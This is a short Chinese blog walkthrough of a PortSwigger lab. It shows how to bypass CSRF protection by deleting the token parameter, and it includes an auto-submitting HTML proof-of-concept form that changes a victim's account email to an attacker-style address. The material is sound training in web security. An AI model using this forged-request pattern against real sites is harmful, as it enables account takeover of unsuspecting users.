首页 > 其他分享 >burpsuite靶场----CSRF----token验证取决于其是否存在

burpsuite靶场----CSRF----token验证取决于其是否存在

时间:2023-10-13 10:00:13浏览次数:42  
标签:CSRF burpsuite ---- token csrf 靶场

burpsuite靶场----CSRF----token验证取决于其是否存在

靶场地址

https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-token-being-present

正式开始

1.登录

2.抓包,发现有token

3.删掉这个csrf参数,发现无影响

但是如果换成GET方式的话不行

4.制作poc

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://0a9f00b704d2d4e583bf6f080023008d.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;abc&#45;evil&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>

5.提交

标签:CSRF,burpsuite,----,token,csrf,靶场
From: https://www.cnblogs.com/thebeastofwar/p/17761240.html

相关文章

  • 循环增删 ArrayList ,小心有坑
    编程过程中常常需要使用到集合,比如:ArrayList,当我们在for循环增删的时候,一不小心就会踩坑。如下代码List<String>arrayList1=newArrayList<String>();arrayList1.add("1");arrayList1.add("2");for(Strings:arrayList1){if("1".equals(s)){......
  • Linux系统CUDA安装及踩坑记录
    https://zhuanlan.zhihu.com/p/501473091  我的Linux系统背景:系统和驱动都已安装。系统是centos8。查看自己操作系统的版本信息:cat/etc/issue或者是 cat/etc/lsb-release用nvidia-smi可以看到显卡驱动和可支持的最高cuda版本,我的是11.4。驱动版本是470.57.02。......
  • xcode15在appstore上显示的更新日志-机翻
    swiftmacrosupportbringsinlineexpansionsandbreakpointdebugginginthesourceeditorGitstaginghelpscraftyournextcommitwithoutleavingyourcodeStringcatalogsstreamlinelocalizationwithasingleplacetoviewandeditstringsBookmarkshe......
  • 云服务测试DPDK
    一、DPDK的系统要求1.1x86上的BIOS的设置先决条件1.1.1 对于大多数平台,不需要特殊的BIOS设置即可使用基本的DPDK功能;1.1.2为了获得额外的HPET定时器和电源管理功能以及小数据包的高性能,可能需要更改BIOS设置;1.2DPDK编译(Ubuntu22.04)......
  • 09_删除字符串中的所有相邻重复项
    删除字符串中的所有相邻重复项【题目】给出由小写字母组成的字符串S,重复项删除操作会选择两个相邻且相同的字母,并删除它们。在S上反复执行重复项删除操作,直到无法继续删除。在完成所有重复项删除操作后返回最终的字符串。答案保证唯一。本题对应于leetcode1047示例:输入:"......
  • .Net核心级的性能优化(GC篇)
    1.前言大部分人对于.Net性能优化,都停留在业务层面。或者简单的.Net框架配置层面。本篇来看下.Net核心部分GC垃圾回收配置:保留VM,大对象,独立GC,节省内存等.Net8里面有很多的各种GC配置,用以帮助你的程序进行最大程度性能提升和优化。文章分为两部分,第一个是GC有哪些动作可以性能......
  • TimesNet:时间序列预测的最新模型
    2020年发布的N-BEATS、2022年发布的N-HiTS和2023年3月发布的PatchTST开始。N-BEATS和N-HiTS依赖于多层感知器架构,而PatchTST利用了Transformer架构。2023年4月发表了一个新的模型,它在时间序列分析的多个任务中实现了最先进的结果,如预测、imputation、分类和异常检测:TimesNet。T......
  • ABB的PLC AC500,PM554的modbus通信
    这个PLC编程软件基于codesys。有一个项目有一个ABB的采集,没有深入了解。暂时网上搜到的资料暂存,以备以后项目使用。另一个项目用的ABB,具体模块型号不知道,串口转网口,modbustcp通信,容易出现plc拒绝通信。测试工具收不到数据。   2018年的资料,不是最新的解决方案基于工......
  • 【转】一次性git revert多条提交
    原文:https://developer.aliyun.com/article/719851如果用gitrevert一个一个revert挺费劲,可以用gitrevertOLDER_COMMIT^..NEWER_COMMIT这种格式这样会在log上多留下多条revert相关的记录,如果不想生成revert相关的记录呢?就是多加个-n参数,然后再通过gitadd和gitcomm......
  • burpsuite靶场----CSRF----token验证取决于请求方法
    burpsuite靶场----CSRF----无防御靶场地址https://portswigger.net/web-security/csrf/bypassing-token-validation/lab-token-validation-depends-on-request-method正式开始1.登录2.抓包,发现有一段token3.尝试删掉token,发现不行4.尝试改变请求方式发现也能实现功......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99